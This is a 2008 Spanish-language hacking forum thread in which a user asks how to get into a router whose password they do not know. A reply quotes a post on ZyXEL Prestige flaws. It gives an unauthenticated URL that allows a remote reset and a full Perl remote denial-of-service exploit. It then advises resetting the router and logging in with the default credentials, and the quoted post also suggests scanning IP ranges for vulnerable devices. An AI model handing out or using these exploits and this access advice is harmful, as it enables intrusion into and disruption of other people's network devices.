elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
30 Agosto 2008, 11:08  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderador: zhyzura)
| | | |-+  ayuda con router
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: ayuda con router  (Leído 233 veces)
nikon1

Desconectado Desconectado

Mensajes: 3


Ver Perfil
ayuda con router
« en: 25 Febrero 2008, 20:21 »

quiesiera entrar a un router que contiene una clave personalizada ya no funciona por defecto como admin ó 1234 quisiera saber que programa hay para entrar :P
En línea
Isirius
Wiki

Conectado Conectado

Mensajes: 2.342


Ver Perfil WWW
Re: ayuda con router
« Respuesta #1 en: 25 Febrero 2008, 20:23 »

Dinos el modelo del router.

Supongo que no tienes acceso físico.

Si por ejemplo es un Zyxel Prestige:

Vulnerabilidades en los routers ZyXEL

Citar
Buenas gente de este foro; publico un texto que es de mi autoria; que publique en el nuevo grupo de hack en el que soy mienbro. Espero que sea de su agrado; es sobre un tema en el que he estado investigando en estos ultimos dias…aqui va:

Se trata en conocer las vulnerabilidades de los routers zyxel, modelos 623,652 y 650HW, del fabricante ZyXEL; sabemos que estos routers lo distribuye la Telefonica generalmente. 

Aunque estos bugs tienen su tiempo ya : ) la gente todavia no se percata del problema; esto se puede verificar escaneando pcs de por ejemplo entre los rangos de ips 80.24.xxx.xxx.   

Bien presento, los bugs mencionados:

1.- Vulnerabilidad en el control remoto que permite resetear el router:

Como todos sabemos, la mayoria de routers se pueden configurar via telnet (23) o via http (80); bien se ha descubierto este bug en la configuracion via web; si escribimos en la barra de direccion de cualquier explorador:


Código:

http://[ipdelrouter] /rPFWUpload.html
Entraremos a la pantalla de configuracion del router en que permite actualizar el firmware; sección que esta desprotegida de password alguna. Si observamos con mas atencion veremos un boton que permite el reseteo completo del router, osea a su configuracion inicial.

Cabe resaltar que esto es posible en cualquier modelo; y funciona si esta activada la configuracion remota (cosa que viene por defecto)

2.- Vulnerabilidad en ZyXEL Prestige 650HW, 650R-11 es afectado por una ataque DoS

Se trata de un bug que permite un DoS; al introducir una larga longitud de caracteres como password; para este agujero existe un exploit creado por frid4y: 


Código:

#!/usr/bin/perl
#
# ZyXEL Prestige 650HW-31 and 650R-11 DSL Router
# Running RomPager 4.07 server
# Remote long password DoS exploit
#
# by frid4y ftff[at]c.dk
#

use IO::Socket;

print "n ZyXEL Prestige 650HW-31/650R-11 DSL Router remote DoS exploitn";
print " k0ded by frid4y ftff[at]c.dknn";

$target = $ARGV[0];
$port = $ARGV[1];
$foo = "shite"; $bar = "1337";
$packet = $foo x $bar;
$string = "GET / HTTP/1.1rnHOST: $targetrnAuthenticate: $packetrnrn";

unless (@ARGV == 2) { die " Usage: $0 <target> <port>nn" }
@ARGV = ($target, $port);

$conn = IO::Socket::INET->new(

      Proto      =>   "tcp",
      PeerAddr   =>   "$target",
      PeerPort   =>   "$port",
   );

unless ($conn) { die " [-] Can’t connect to targetnn" }
   else {
      print $conn $string;
      print "
  • Package delivered to $ARGV[0]nn"
   }

close($conn);

La Solucion para los que usan estos router es primero: desabilitar la configuracion remota y segundo: actualizar el firmware. Para mas informacion visiten los siguientes links:

http://www.adslayuda.com

Fuente- Dragonjar

En tu caso podrias utilizar la primera y entonces entrar con el user y password default. Pero como no has dicho el modelo pues e tenido que imprivsar con el más utilizado :P.

Saludos.
« Última modificación: 25 Febrero 2008, 20:26 por Isirius » En línea

Páginas: [1] Ir Arriba Imprimir 
Ir a:  





Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC